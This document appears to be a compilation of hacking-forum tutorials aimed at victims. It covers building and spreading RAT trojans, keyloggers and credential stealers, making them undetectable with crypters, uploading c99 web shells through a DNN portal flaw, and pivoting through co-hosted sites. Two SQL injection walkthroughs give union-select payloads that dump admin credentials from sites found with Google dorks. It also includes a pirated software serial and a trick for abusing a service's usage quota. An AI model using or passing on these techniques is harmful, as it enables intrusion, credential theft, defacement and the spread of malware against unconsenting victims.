Remote Administration Tool Beginners Tutorial

Remote Administration Tool Beginners
  • What is a Remote Administration Tool?
  • How do Remote administration Tools work?
  • Port Forwarding on your Router
  • Legal & Illegal RATs
What is a Remote Administration Tool?

A RAT is the Abbreviation/Shortcut of Remote Administration Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him the Executable file you have created with your RAT, or either use a Java drive-by to make your slave activate the virus by running a Java applet.

How do Remote Administration Tools work?

A remote administration tool has a Executable file and client technology. The Executable file runs on a controlled host computer and receives commands from the client, which is installed on other remote host. A remote administration tool works in background and will hide for users. You can monitor user’s activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, turn off or restart a computer and fun abilities such as turning on Webcams/Changing wallpapers and much more.

Remote administration tools are divided into malicious and legitimate applications. Illegal RATs, also known as remote administration trojans, are analogous to Backdoors and have very similar functionality. However, they aren't viral, do not propagate by themselves and usually do not have additional destructive functions or other dangerous payload. These Malware containing files do not work on their own and must be controlled by the client.

This is how you create your Executable file on a RAT:

BlackShades RAT

Darkcomet RAT

NetWire RAT

CyberGate RAT

Port Forwarding on your Router

First of all you have to find your Router's IP Address information.
To view your IP address information do these two steps:
Start > Run then type CMD then press Enter.
Than you have to type in your Command Prompt: IPconfig/all

If you see your network interface with a list of IP addresses (should not be all's addresses). If you got an IP starting with 192.168... or 10.0. That's very good! Find the Gateway IP Address. This is the router's IP address.
It may be one of the following that are appearing in your CMD. If you have no clue try one of the following:
Once you have find your Router's IP address, type that in your Internet Web browser, You will see a Administrator Login page. When this is the first time accessing the router. It will be most likely Default Passwords of:
admin - No Password
No Username - admin
admin - password

Alternatively, you can search Google with your Router Model number and there are enough people on different forums that will have the right default password that you need to use for your router.
Whenever you're logged in on your Router, You first go to UpnP (Universal Plug & Play) and start Enabling that. For security You may disable your Firewall on your Router but also on your Windows Computer, this is to prevent your Ports being closed whenever you have Port Forwarded it for your RAT.
Port Forwarding is the process that is needed to forward different types of Internet connections into your Network. Understand that the Router is protecting your networking by segmenting it; so it's doing its job. Port Forwarding is one way to allow traffic into your network (manually), but now most routers and devices allow UPnP. Despite some possible security risks, it has been very popular and useful in Peer-to-Peer applications like uTorrent. Port forwarding is necessary because your router is designed to automatically reject any inbound connections that you didn't initiate. 

So if you want to RAT or play a Online Game you need to set your Ports First, you will be able to connect to them and conversely they need to connect to you. If you have the router toggled on a "game" mode or similar, it will create a lag in the beginning as it attempts to learn what you are doing. This isn't ideal. 

You can use any Common Ports if you'd like to Port Forward for a RAT.
This can be many many ports, a Recommendation would be over 1000+
Some examples of ports here:
  • 2000
  • 2001
  • 3080
  • 3081
  • 1604
  • 1337

For Ratting you have to make sure you use TCP+UDP as your Protocols, Because RATs use a lot of features and some of the features require UDP instead of TCP that is needed for the connections. And you also have to make sure that you'll be using the IPV4 Address of your Host computer.
Different Computer accounts will not have the same IPV4 Address!

If you do not have the same Router as that i have, Search for your Router Model Number and go to Most of the used Routers that you need to PortForward on can be found on; That website will provide a good Tutorial on how to Port Forward for your Router. It's noob-friendly and almost all Routers on there.

Legal & Illegal RATs

There are Illegal RATs but also Legal RATs, You might be thinking what?
Illegal RATs since when are there Legal RATs? I will list here The RATs that are Legal and created by Members of HackForums and other Hack Forums and the RATs that are Illegal and coded by Official Companies or HackForum Members:

Illegal RATs:
  • Cerberus Rat
  • ProRat
  • Poison Ivy
  • NetWire RAT
  • BlackShades
  • Darkcomet RAT

Legal RATs:
  • Teamviewer
  • Darkcomet 5.4 Legacy
  • Ultra VNC
  • Ammyy Admin
  • Mikogo

Free Unlimited Internet via PD Proxy

Free Unlimited Internet via PD Proxy

How to work with it?
1. Sign up for an account ( Sign Up for Free

2. Download and unzip PD-Proxy
3. Open PD-Proxy.exe When a prompt message asking you to install a driver press Yes.
4. Press connect and wait till it says that you are connected.
5. Enjoy browsing the internet safely and securely…


1. Make sure that you have activated your registered account.
2. Make sure the program has administrative privileges when using Vista/7
3. Make sure you have an active internet connection.

PD Proxy Settings:
Step 1: Goto 3rd tab & Click “Click Here to Show Advance Settings…“

Step 2: Click On ” Proto Option

TCP Server Port-

Port: 443

 UDP Server Port-

Port: 80

Port Settings:-

Bind Local Port: 0

Click on ” Save & Go back “

Step 3: Click on “Connect” button and wait for the ” Succesfully connected to server! message “

Bingo!! You are done

**Important Things**

1. PD Proxy only limited to 100 MB for per id [1 ID = 100 MB]

2. If you want to use unlimited Internet then register as many id as you can!!

3. Logout when 90 MB download done & sign in again with new id

4. And again you will get 100 MB :p You can do this whole day

5. If somehow you reached 100MB you will be auto disconnect from Internet & You can’t use PD Proxy for 1 day !!

6. If you want to get unlimited email id to Sign-up in PD Proxy Just give your mail id in reply  i will mail you ASAP!

Project Neptune Keylogger [TuT]

Project Neptune is back and better than ever, with brand new settings, new functionality, and complete stability.

First of all download project Neptune keylogger from there official website.

latest Version 2.0
Last Update Date: 9/15/2012 (Premium, bug fixes, reflection prevention.)

Extract the .rar file with Winrar or other tool, a folder will come up with name project Neptune.
Open project Neptune v2.0, a popup will shoow up, these ate the rules of using the tool, click OK and the keylogger will show up.
Im using the Email settings not the ftp setting and im using If you are using follow the instructions as in the picture
Im putting at 30 minuters the sending of logs coz for me is more good.At bouth use your gmail addres , At password enter your gmail password. Now click test, if is correct we continue at System wide, if not check if you write the informations correct.
I just enabled the only options that I need, so the slave will not understand that you ate keylogged.
At Installation just do what i did in snap and don't change anything .
You can use this Fake Error option if you want like me its up to you .
Server Creation and click Generate new Server.Save your server someware and that’s it.
You now created your first keylogger . Great Now go spread it

One last note: The free version currently isn't FUD, nor will the premium version be.So use a good Crypter to FUD your server.

 Working Perfectly here is the Snap : 

SQL Injection Complete Tutorial [Website Hacking]

Okay first find a volnuerable website
to get volnerable websites
and type one of these dorks


well there is a huge list of google dorks
you can get these from google

when you type one of the google dork..thousands of sites
will be searched
now open a website and type ' at the end of url
if you get this error

Then the website is vuln and you can try to hack it

okay now that you have this error

now you need to find number of columns

now remove ' and type

order by 1(syntax)
now your url will be like order by 1

if you dont get any error then increase number order by 2 (no error) order by 3 (no error) order by 4 (no error) order by 5 (no error) order by 6
ohh error came here

Unknown column '6' in 'order clause'

so you have this number of columns in this website is 5

now its time to use union all select statement

oka as we know our website has 5 columns
now wee need to find vunl columns

for that use this syntax union all select 1,2,3,4,5--

now see the pic 3

here you can clearly see some bold numbers

in this website the number is 3

that mean string column is 3


now lets check the MySql version of the website

to check this you need to replace your url with
?id=465 union all select 1,2,@@version,4,5--

oka now see the pic 4

you can clearly see in this pic that

where the column number was written, now there is some changing and that is the
database version

okay if the number is greater than or = 5 then its good
because its easy to crack
if its below then you the sql injection is blind
(it does not mean that you cant crack the db but we have to guess
the table names and all )
so now as we have checked this
now we gonna crack its db
lets find the tables of this database
oka now replace the url with union all select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()

if it does not work then use union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

wow see the pic 5 below

we have all its table now

now we have to check its tables and find some table with sensitive information

it may be admin , users , usergroups etc

okay so here im trying to crack this table


oka so now we need to replace our url with union all select 1,2,column_name,4,5 from information_schema.columns where table_name=cpg131_users

install hackbar (adds on of firefox) as i have
now click on sql >mysql>Mysqlchar
and type the table name
then you wil get its value

now the decimal value of cpg131_users is (99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

oka copy it and replace the url with union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

well its working

see pic 6

now we need to fetch data of columns

now in this website
the information is in columns


oka to fetch these

replace the url with


we have done it guyz..

there are 3 users in this database


Elite-Stealer 2.0

Features :

• Mozilla Firefox/Fire FTP 4 - 10
• JDownloader
• Google Chrome
• FileZilla
• Pidgin
• Steam Username
• Opera

• PHP Send
• FTP Send
• FUD [ Fully Undetectable by Antivirus ]

Download Link :
Unloack File :

Working snap :: Check How logs ( victims PC information ) Show

Facebook Hacker V1.0 A Keylogging Software

By following this simple step-by-step tutorial you’ll learn how to hack Facebook accounts without phishing.
Please read the below given tutorial to know how to use this Facebook Hacker tool to Hack Facebook Accounts.


STEP 1: First ensure that you have installed Microsoft .Net Framework. If not, then you can download it  .Net Framework :

STEP 2: DOWNLOAD the Facebook Hacker 

Download :
password to unlock file :
STEP 3: Extract the downloaded “Facebook Hacker” file using Winrar
STEP 4: Open “Facebook Hacker.exe” file.
STEP 5: After opening the “Facebook Hacker.exe” file build your password stealer as shown in the image below:
STEP 6: Now a new file will be created in the same directory with the name you provided while building (eg. server.exe). Just send the file you created to the victim and if the victim runs this file….W00t….you will get his Facebook account’s username and password to your fake email ID which you provided while building the file.
NOTE: The “Stub.exe” file may get detected by your anti-virus. Please don’t open the “Stub.exe” file and don’t delete it too, otherwise the stealer created by you won’t work at all.
Working Snap :

How to set up No-ip host - Free Dynamic DNS host

How To Setting Up No-ip Host

Follow the bellow steps below to setup a No-ip free dynamic host:

Step 1: Register an account at After email verification, login to your account and click on “Add a host” to get this page:

Step 2:  Now, fill the information as below:
Hostname: Choose anything you want. Mostly use “” from drop down box, select (Don’t use any other or it may not work).

Step 3:  Leave all things same as it is and hit on “Create host”.

Step 4:  Now, free download No-ip client and install it on your computer. Run the No-ip client software and enter your No-ip login and password. After successful login, No-ip shows pop-up box like this(if it doesn’t show, hit on “Select Hosts”):

Step 5:  Hit on checkbox just besides your host created in step 3 and hit on Save.

That’s it. You have completed setting up free No-ip host.

Increase IDM Download Speed using IDM Optimizer

How to Use IDM Optimizer :

1. Download IDM Optimizer.
2. Now make sure IDM is installed on your PC, now just fire up your IDM Optimizer and than you will see Window like above just click on Maximize Now and you will get a note asking you to restart your IDM do that and once restart your PC.
3. That’s it now your IDM is boosted with speed, try to download any file and check out out if speeds are good or not.
4. If you want to restore your default settings than you can click on Restore Default.
That’s it guys now you have boosted your IDM with Speed, optimized it for faster downloads have fun :) and do share this post with all friends.

Password to unlock :

Ardamax Keylogger 3.9 Free Serial with Remote Installation

Ardamax Keylogger is a invisible computer monitoring application.We need monitoring softwares to record PC activity when we are away. You can also use them if you want to log the passwords when your friends log in through your computer.So, today I have decided to giveaway the serial of  Ardamax keylogger  3.9.1 worth USD 44.95

Features :
1. Get Ardamax Keylogger 3.9/3.9.1 Serial ( We Are Here)
2. Ardamax Keylogger with Remote Installation package
3. FUD/UD binders and Crypters
4. Hex Edit Ardamax Keylogger to make it FUD 

The given below features are extracted from their official site:

Email log delivery 
  • FTP delivery 
  • Network delivery 
  • Clipboard logging 
  • Invisible mode 
  • Visual surveillance 
  • Chat monitoring
    • Security
    • Application monitoring 
    • Time/Date tracking
    • Powerful Log Viewer 
    • Small size 

    Activation Code:
    Name: h3d1und 3r1k
    Serial: 206B-2A3B-91A2

    WORKING 100% [ w0rking snap] 

    Portal Hacking (DNN) - Website Hacking Technique

    Hello friends today i am posting one of the latest technique to hack any website known "Portal Hacking (DNN)"...
    All the steps are explained In details below:

    step 1:

    go to Google

    Step 2:
    Now put this string on search box (Google dork)


    See below image 

    Step 3:

    It will show a list of many sites, Select the site which you want to hack.

    for example let us take this

    Step 4:
    Now replace


    With this

    you will see this on screen
    Step 5:

    You will get the Link Gallary page in.

    Step 6:

    Now replace the URL in the address bar with a Simple Script given below.


    Step 7:
    You will Find the Upload Option see image below.

    Step 8:

    Select Root and Upload your package Your Shell c99,c100 etc ....

    Hack a Gmail Account Easily. {Guaranteed Hack}

    Okay I will make the Tutorial Short and Clear. For this I'll Explain you STEP by STEP.

    -Go to Youtube

    -Search "Runescape Hacker" or "Runescape Hacker Download Link"

    -Find the Download Link (They are usually in the comments Section.)

    -Download the Runescape Hacker Tool.

    -Don't open the Runescape Hacker Tool, It may be Backd00red Instead place it in a Separate Area.

    -Download HexWorshop. Google it and you will Find the Link.

    -Install HexWorkshop.

    -Now go to the downloaded RunescapeHacker Phile and Right Click on it !

    -Now You Will see something like "Edit this with HexWorkshop" Click It !

    -Now you will see the HexWorkshop Screenie. Do Nothing, You will Feel confused for the First time But Believe it's Easy.

    -Just go to the Edit on the Top and Find a Button "Find"

    -When you get 'Find", Click on it !

    -Now Before start Finding Anything Make sure you change the "Hex" to "String" value.

    -Now Enter "Gmail" to the Box and Hit "Find".

    -You will Get Popping Up a Black area. Don't touch it. Instead see on your Right for the Texts.

    -Copy the Highlighted text and Paste it in a Text document (Newly Created).

    -Remove the [.]>DOTs and You will see The Email ID + the Passwd.

    Hope you Enjoy my Stuffs.


    Sometimes site that is your TARGET just isn't hackable. Even Acunetix Web Security Scanner can't find useful vulnerability. In that kind of situation the only thing that might work is to hack site (backdoor site) that is on same server and through that site and through server to penetrate the site.

    Tools required:

    Finding Backdoor Site

    To find backdoor site go to
    and in Whois Lookup enter your TARGET site

    As a result you'll get Whois Record

    Look for Reverse IP
    In our case 25 other sites hosted on this server.
    Click on it to see names of the hosted sites on the same server.

    You will see few of them, to see all, click on more...

    To see them all you must be a member.
    You can easily Sign up for a FREE account by cicking on Create an Account
    (use some anonymous email service for that)
    As a member you can see all 25 other sites hosted on that server.

    Hacking Backdoor Site
    Here we have 25 potentional backdoor sites and our target one.
    Let's say after analysing we find that our backdoor sites No17 (as example) and target No22
    Backdoor site can be any one from the list who can be hacked and sell uploaded 

    Penetrate Target Site
    By cicking on var/ at we go straight to root of the server

    Where we can find our dir.
    Sometimes premisions isn't drwx but dr-x which is more then enough to read configuration file

    With data from that file we can hack unhackable site..

    SQL Injection Tutorial! 100% NOOB FRIENDLY

    SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed

    SQL Injection

    Hi, this thread covers all your basic SQL Injection needs. After reading this, you should be able to successfully retrieve Database information such as the username and password that are crucial for defacing sites.

    Lets start.

    What is SQL Injection?
    is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

    Step 1: Choose Your Target:
    Of course, you can't SQL Inject nothing. You must have a website as a target. Remember, only vulnerabl sites are able to be injected into. You can't just SQL Inject any site *sigh*.

    So how do we see which sites are vulnerable? There are many lists of vulnerable sites out there. But if you wish to find them manually, read on.
    Wtf is this? These are "Dorks" that you can use to find vulnerable sites. Go to Google and simply copy and paste one of those dorks and click search.

    I personally recommend going here (scanner seems to be down) to see which sites are vulnerable, but if you wish to do THAT manually also, read on. If not, skip to Step 2.

    After you have Googled the dorks, click on any site.

    To check the site for vulnerability, simply add a "'" to the end of the URL (without the quotes). It should look somewhat like this:


    If the page simply refreshes, the site is not vulnerable. But if an error of any kind pops up, the site is prone to SQLi. When you have successfully found a vulnerable site, proceed to Step 2.

    Step 2: Find the Vulnerable Column
    Now that we found our vulnerable site, we will need to find the vulnerable columns.

    Add this to the end of the URL:

    Code: order by 1--

    Now here's where it gets tougher (not really). You have to look for errors as you enter new numbers. For example:

    Code: order by 1-- (no error) order by 2-- (no error) order by 10-- (ERROR!) order by 5-- (no error) order by 6-- (ERROR!)

    The goal here is to find the least column the shows the error. As you can see in the example, the lowest column that we found an error on is column 6, therefore, column 6 doesn't exist and there are only 5 columns.

    Now we have to find which one of these five columns (it may be different in your case) is vulnerable, to do that, add this code to the end of the URL:

    Code: union select 1,2,3,4,5--

    Make sure to include the - in the beginning and the -- at the end, this is crucial. Remember that the code above may be different in your case regarding how many columns there are.

    Now, if you see numbers on the screen. You can proceed. The very first number is the number of the vulnerable column. If the number is "4" that means that the 4th column is the vulnerable column.
    Step 3: Obtain Version Number and Database Name
    That vulnerable column is the ONLY column that we will be editing.

    Assuming that the vulnerable column is 4 (it may be different in your case), proceed to find the version number. To find the version number, replace the vulnerable column with "@@version" like this:

    Code: union select 1,2,3,@@version,5--

    If the version is 5 or above, proceed. If not, it will be harder to hack. There are other tutorials covering how to hack database versions 4 or lower.

    Now we must find the database name. To do this, replace the "@@version" from before with "concat(database())" like this:

    Code: union select 1,2,3,concat(database()),5--

    And BOOM! The database name should appear on your screen. Copy this somewhere safe, we will need this for later.
    Step 4: Obtain Table Names

    We are almost done, don't give up just yet.

    Now we have to find the table names. This is crucial because the tables contain all of the information that we may need. Some hackers look for credit card information and e-mail adresses, but in this tutorial we will be looking to retrieve the username and password in order to deface the site.

    Edit the code as follows:

    Code: union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--

    Now, names appear. Look for obvious names hinting to tables where user information can be stored. You are looking for table names such as "Admin", "Users", "Members", "Admin_Id", Admin_pass", "User_id", etc..

    The last character is chopped off? Don't worry. Count how many tables you can see, then add this code based on the tables that you can see. We will be assuming that the last table you can see is the 8th table.

    Code: union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--

    This code is to view the 9th table. Replace the 8 with a 9 to view the 10th table, and so on until you find the table that you think has the most crucial information.

    When you find the table, copy the name somewhere safe. We will need both the database and table names for the next step.

    For this tutorial, we will be using the table name of "admin".
    Step 5: View the Columns, and Find the Crucial Shit
    Here comes the fun part :3

    To find the column names, add this to the end of the URL:

    Code: union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--

    Didju get an error? OH NO! YOU FAIL. Choose another site. Just kidding.
    Go here and type in your table name where is says "Say Hello to My Little Friend".

    In my case, this is the string that I got after I inputted "admin" to the input space:


    Now, replace the table name with hex as so:

    Code: union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--

    Notice how I added the "0x", that is to indicate that hex is being used. Remember to get rid of the quotes.

    Now after you enter this code, you should see where all the juicy information is contained. An example of what you should see is:

    Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members, etc..

    Now say you want to view what is in the "Admin_Username" and the "Admin_pass", add this code (in this example we will be using "database" as the database name and "admin" for the table name):

    Code: union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin--

    The "0x3a" will put a colon to where the information will be separated. You should get something like this:


    The username is "MyName" and the password is.. WAIT! That is MD5, crack this using Havij 0r U can decrypt online md5 cracker( .

    Now as you can see. This is the login info:

    Username: MyName
    Pass: 123456

    Now all you have to do is find the admin page, which is usually

    or something similar. There are tools online that will find you the admin page.